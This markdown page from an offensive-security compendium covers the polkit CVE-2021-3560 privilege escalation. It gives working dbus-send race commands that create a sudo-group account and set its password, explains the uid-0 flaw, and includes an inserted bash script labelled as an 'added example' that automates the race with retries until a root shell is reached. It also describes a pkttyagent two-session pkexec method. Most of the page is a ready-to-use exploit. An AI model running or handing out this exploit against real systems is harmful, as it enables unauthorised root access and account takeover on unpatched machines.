killchain-compendium/exploit/linux/polkit.md

CVE-2021-3560

  • Vulnerable: Ubuntu 20.04 polkit (package policykit-1) older than 0.105-26ubuntu1.1; upstream polkit 0.113 through 0.118, fixed in 0.119. Check the installed version with `dpkg -l policykit-1` or `pkexec --version` before trying the race.

Race Condition

  • Ask accountsservice over D-Bus (dbus-send, no pkexec involved) to create an administrator account, then kill dbus-send a few milliseconds later, while polkit is still deciding whether the caller is authorised. `int32:1` is the administrator account type, which puts the new user in the sudo group. The sleep has to be tuned to the machine: time a complete call (`time dbus-send ...` with the same arguments) and use roughly half of it, then repeat until `id user1` succeeds.

```bash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
```

  • Generate the password hash with `openssl passwd -6 -salt salt password123` and set it with the same trick. The object path ends in the new user's uid (`User1000` assumes it got uid 1000; confirm with `id user1`), and the second string argument is the password hint, not the password.

```bash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
```
  • Why it works: dbus-send is killed after polkit has received the authorisation request but before it has finished handling it.

  • polkit asks dbus-daemon for the uid of the connection that sent the message; that connection no longer exists, so the lookup fails with an error.

  • Instead of rejecting the request, vulnerable polkit mishandles the error and carries on with uid 0, i.e. it treats the request as if root had sent it.

  • accountsservice is told the caller is authorised and the request succeeds (the account is created, or the password is set).

  • `su user1` with the chosen password, then `sudo -s` for a root shell.
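The two races above have to be repeated with a tuned delay until they land, so here is the procedure as one script. This is an added example written for this note, not code from the original compendium or from polkit: it assumes dbus-send, openssl and GNU date/sleep are present, that the target's polkit is unpatched, and that a freshly created account reports `Locked = true` over the org.freedesktop.Accounts.User interface until a password has been set (an assumption used only for the success check). Nothing runs unless the script is invoked with `--run`.

```bash
#!/usr/bin/env bash
# Added example: automates the CVE-2021-3560 race from the note above.
# Assumptions: vulnerable polkit, dbus-send/openssl/GNU coreutils available.
# Usage: ./polkit-race.sh --run [username] [password]

ACCOUNTS_DEST=org.freedesktop.Accounts
ACCOUNTS_PATH=/org/freedesktop/Accounts

# Half of a duration in seconds, e.g. "0.012" -> "0.0060". The window that
# works is roughly half the time one complete dbus-send round trip takes.
half_seconds() {
    awk -v t="$1" 'BEGIN { printf "%.4f\n", t / 2 }'
}

# Time one complete (not killed) CreateUser call. Without an agent polkit just
# answers "not authorized", which is exactly the round trip we want to measure.
measure_roundtrip() {
    local start end
    start=$(date +%s.%N)
    dbus-send --system --dest=$ACCOUNTS_DEST --type=method_call --print-reply \
        $ACCOUNTS_PATH org.freedesktop.Accounts.CreateUser \
        string:"$1" string:"New Account" int32:1 >/dev/null 2>&1 || true
    end=$(date +%s.%N)
    awk -v a="$start" -v b="$end" 'BEGIN { printf "%.4f\n", b - a }'
}

# Send CreateUser (account type 1 = administrator) and kill the sender after
# $2 seconds so its connection is gone while polkit is still looking it up.
race_create_user() {
    dbus-send --system --dest=$ACCOUNTS_DEST --type=method_call --print-reply \
        $ACCOUNTS_PATH org.freedesktop.Accounts.CreateUser \
        string:"$1" string:"New Account" int32:1 >/dev/null 2>&1 &
    sleep "$2"
    kill "$!" 2>/dev/null || true
}

# Same race against SetPassword on the created user's object. $1 = uid,
# $2 = crypt(3) hash, $3 = delay. The second string is only the password hint.
race_set_password() {
    dbus-send --system --dest=$ACCOUNTS_DEST --type=method_call --print-reply \
        "$ACCOUNTS_PATH/User$1" org.freedesktop.Accounts.User.SetPassword \
        string:"$2" string:"hint" >/dev/null 2>&1 &
    sleep "$3"
    kill "$!" 2>/dev/null || true
}

# Assumption: the Locked property flips to false once a password is set.
# Reading properties needs no authorisation, so this is a safe probe.
password_is_set() {
    dbus-send --system --dest=$ACCOUNTS_DEST --type=method_call --print-reply \
        "$ACCOUNTS_PATH/User$1" org.freedesktop.DBus.Properties.Get \
        string:org.freedesktop.Accounts.User string:Locked 2>/dev/null \
        | grep -q 'boolean false'
}

main() {
    local user="$1" pass="$2" rt delay uid hash tries=0
    rt=$(measure_roundtrip "$user")
    delay=$(half_seconds "$rt")
    echo "round trip ${rt}s, racing with delay ${delay}s"
    # Retry until the account exists; the window is noisy, so a handful of
    # attempts is normal and 50 misses means the delay (or the target) is off.
    until uid=$(id -u "$user" 2>/dev/null); do
        tries=$((tries + 1))
        if [ "$tries" -gt 50 ]; then
            echo "gave up creating $user after $tries attempts" >&2
            return 1
        fi
        race_create_user "$user" "$delay"
        sleep 0.5
    done
    echo "created $user (uid $uid) after $tries attempt(s)"
    hash=$(openssl passwd -6 -salt salt "$pass")
    tries=0
    until password_is_set "$uid"; do
        tries=$((tries + 1))
        if [ "$tries" -gt 50 ]; then
            echo "password race did not land; verify manually with: su $user" >&2
            return 1
        fi
        race_set_password "$uid" "$hash" "$delay"
        sleep 0.5
    done
    echo "password set; now: su $user && sudo -s"
}

if [ "${1:-}" = "--run" ]; then
    main "${2:-user1}" "${3:-password123}"
fi
```

If the create loop never succeeds, rerun the measurement a few times and try delays on either side of the halved value; the same `delay` is reused for SetPassword because both calls go through the same authorisation path.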

Priv Esc with Two Sessions

  • This is for the case where pkexec over SSH fails with "No authentication agent found": pkttyagent registers a text-mode polkit agent for the other session so the password prompt appears there. The user must already be a member of the sudo group (the default policy asks for an administrator's password), so this gets a root shell through polkit rather than bypassing it.
  • Open two SSH sessions as that user.
  • In session one, note the shell's PID:

```bash
echo $$
```

  • In session two, register an agent for that PID:

```bash
pkttyagent --process <PID of s1>
```

  • In session one, run:

```bash
pkexec "/bin/bash"
```

  • Enter the password at the prompt in session two; session one gets the root shell.